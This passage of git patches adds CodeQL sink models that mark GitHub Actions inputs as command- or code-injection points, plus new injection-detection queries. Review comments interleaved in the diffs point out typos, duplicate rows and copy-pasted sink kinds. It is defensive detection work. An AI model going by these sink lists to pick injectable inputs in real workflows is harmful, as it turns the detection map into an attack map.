+ - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
new file mode 100644
index 000000000000..91a3382348ca
--- /dev/null
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
new file mode 100644
index 000000000000..d9d15dc94b27
--- /dev/null
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
new file mode 100644
index 000000000000..6bc0467692d2
--- /dev/null
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"]
+ - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
new file mode 100644
index 000000000000..62dea47d8184
--- /dev/null
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"]
+ - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"]
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml
new file mode 100644
index 000000000000..525d0199859d
--- /dev/null
+++ b/ql/lib/ext/py-actions_flake8.model.yml
@@ -0,0 +1,12 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"]
+ - ["py-actions/flake8", "*", "input.plugins", "command-injection"]
+ - ["py-actions/flake8", "*", "input.path", "command-injection"]
+ - ["py-actions/flake8", "*", "input.ignore", "command-injection"]
+ - ["py-actions/flake8", "*", "input.exclude", "command-injection"]
+ - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"]
+ - ["py-actions/flake8", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml
new file mode 100644
index 000000000000..5aac0f894327
--- /dev/null
+++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"]
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml
new file mode 100644
index 000000000000..d32c6509ad7e
--- /dev/null
+++ b/ql/lib/ext/pyo3_maturin-action.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.target", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.command", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"]
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
new file mode 100644
index 000000000000..c4ea326ecef0
--- /dev/null
+++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
@@ -0,0 +1,24 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
new file mode 100644
index 000000000000..7213a39f992b
--- /dev/null
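Review bot: The fifth data row names the input `input.sdcard-path-or-size'` with a trailing apostrophe, so it can never match the action's real `sdcard-path-or-size` input and that sink is silently lost; it should read `- ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size", "command-injection"]`. The last six rows repeat `input.ndk` verbatim, and `input.ndk` is already listed two rows earlier, which looks like copy-paste placeholders that were never filled in with the intended inputs. Either replace them with the inputs that were actually reviewed or drop them, so the model only asserts sinks someone has checked.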
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml
@@ -0,0 +1,13 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"]
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml
new file mode 100644
index 000000000000..3207c6d75211
--- /dev/null
+++ b/ql/lib/ext/renovatebot_github-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"]
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml
new file mode 100644
index 000000000000..d00d78bcba8a
--- /dev/null
+++ b/ql/lib/ext/roots_issue-closer-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"]
+ - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"]
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml
new file mode 100644
index 000000000000..e2813105bdc9
--- /dev/null
+++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"]
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml
index 0190ffd9ad72..d6ba27a50798 100644
--- a/ql/lib/ext/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/ruby_setup-ruby.model.yml
@@ -4,3 +4,8 @@ extensions:
 extensible: summaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"]
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
index 87610c434403..413f4f3058bc 100644
--- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
@@ -4,3 +4,8 @@ extensions:
 extensible: summaryModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"]
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
new file mode 100644
index 000000000000..42361b203e08
--- /dev/null
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
new file mode 100644
index 000000000000..474b36186b09
--- /dev/null
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["snow-actions/eclint", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
new file mode 100644
index 000000000000..73b93dbb88af
--- /dev/null
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
new file mode 100644
index 000000000000..4138b97f0fb2
--- /dev/null
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
new file mode 100644
index 000000000000..1bcbac476a80
--- /dev/null
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tibdex/backport", "*", "input.body_template", "code-injection"]
+ - ["tibdex/backport", "*", "input.head_template", "code-injection"]
+ - ["tibdex/backport", "*", "input.labels_template", "code-injection"]
+ - ["tibdex/backport", "*", "input.title_template", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 21a0b479ef55..7c681d8a64b3 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
@@ -19,4 +19,4 @@ extensions:
 - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
new file mode 100644
index 000000000000..3072c6f54fd3
--- /dev/null
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -0,0 +1,15 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
new file mode 100644
index 000000000000..5fe53ea3d079
--- /dev/null
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"]
+ - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
new file mode 100644
index 000000000000..5e87f6c3b941
--- /dev/null
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
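Review bot: The last data row has a stray apostrophe in the input name, `input.tag-prefix'`, so the tag-prefix sink will never match an actual `with: tag-prefix:` usage and is silently dead; it should be `- ["tripss/conventional-changelog-action", "*", "input.tag-prefix", "command-injection"]`. The same typo appears in the reactivecircus model above (`input.sdcard-path-or-size'`), which suggests these rows were produced by hand-editing a quoted list; a quick grep for `'"` across `ql/lib/ext/` would catch any others.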
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
new file mode 100644
index 000000000000..dbe5d2d542dd
--- /dev/null
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
new file mode 100644
index 000000000000..9ecbdb6329f5
--- /dev/null
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
new file mode 100644
index 000000000000..10920eb6bf59
--- /dev/null
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
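Review bot: `input.url` is listed twice in the veracode/veracode-sca model (first and last data row); the duplicate adds nothing to the sink set and looks like a placeholder for another input that was never substituted. Either drop the final `- ["veracode/veracode-sca", "*", "input.url", "command-injection"]` row or replace it with the input that was meant to be modeled.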
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"]
+ - ["zaproxy/action-baseline", "*", "input.target", "command-injection"]
+ - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"]
+ - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml
new file mode 100644
index 000000000000..a1d49af08456
--- /dev/null
+++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"]
+ - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"]
+ - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"]
+ - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"]
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 1e7414e5ce6d..9e94968e280c 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -21,7 +21,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } }
From d21d453d1ccf9039b98df6adf0d6948dddf23743 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 16:30:23 +0100
Subject: [PATCH 118/707] Split queries
---
 ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++
 .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++
 ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++
 .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++
 .../Security/CWE-094/ExpressionInjection.ql | 3 +-
 ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++
 6 files changed, 206 insertions(+), 2 deletions(-)
 create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql
 create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql
 create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql
 create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql
 create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql
new file mode 100644
index 000000000000..2a2225e17b6e
--- /dev/null
+++ b/ql/src/Security/CWE-078/CommandInjection.ql
@@ -0,0 +1,38 @@
+/**
+ * @name Command built from user-controlled sources
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
new file mode 100644
index 000000000000..3834b0ac0d06
--- /dev/null
+++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
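Review bot: The alert message in the select clause still says `Potential expression injection`, although this query reports command injection (`@id actions/command-injection`, CWE-078), so users will see the wrong finding name; it should read `"Potential command injection in $@, which may be controlled by an external user."`. The same copy-pasted message appears in CriticalCommandInjection.ql, CodeInjection.ql and CriticalCodeInjection.ql in the following hunks and should be adjusted per query. Separately, CriticalCommandInjection.ql reuses the identical `@id actions/command-injection`, and the two code-injection queries both declare `@id actions/code-injection`; query ids have to be unique within a pack, so the critical variants need their own ids (for example `actions/critical-command-injection` and `actions/critical-code-injection`) or the results of the pair will be reported under one rule.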
@@ -0,0 +1,44 @@
+/**
+ * @name Command built from user-controlled sources
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
+where
+ MyFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
new file mode 100644
index 000000000000..7ad0e98bc492
--- /dev/null
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
@@ -0,0 +1,40 @@
+/**
+ * @name Code injection
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
new file mode 100644
index 000000000000..5a4bbaca034a
--- /dev/null
+++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
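Review bot: `CodeInjectionSink` is built from `externallyDefinedSink(this, "request-forgery")`, so this code-injection query selects the sinks modelled for request forgery and never the `code-injection` models it is named after — a copy-pasted sink kind; CriticalCodeInjection.ql in the next hunk has the same constructor. The line should read `CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }`. PATCH 119 in this series makes exactly that change, so it could be squashed into this commit.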
@@ -0,0 +1,46 @@
+/**
+ * @name Code injection
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
+where
+ MyFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 9e94968e280c..1e7414e5ce6d 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -21,8 +21,7 @@ import codeql.actions.dataflow.ExternalFlow
 
 private class ExpressionInjectionSink extends DataFlow::Node {
 ExpressionInjectionSink() {
 exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
- externallyDefinedSink(this,
- ["expression-injection", "command-injection", "request-forgery", "code-injection"])
+ externallyDefinedSink(this, "expression-injection")
 }
 }
diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql
new file mode 100644
index 000000000000..3675597fcd74
--- /dev/null
+++ b/ql/src/Security/CWE-918/RequestForgery.ql
@@ -0,0 +1,37 @@
+/**
+ * @name Uncontrolled data used in network request
+ * @description Sending network requests with user-controlled data allows for request forgery attacks.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9.1
+ * @precision high
+ * @id actions/request-forgery
+ * @tags actions
+ * security
+ * external/cwe/cwe-918
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class RequestForgerySink extends DataFlow::Node {
+ RequestForgerySink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
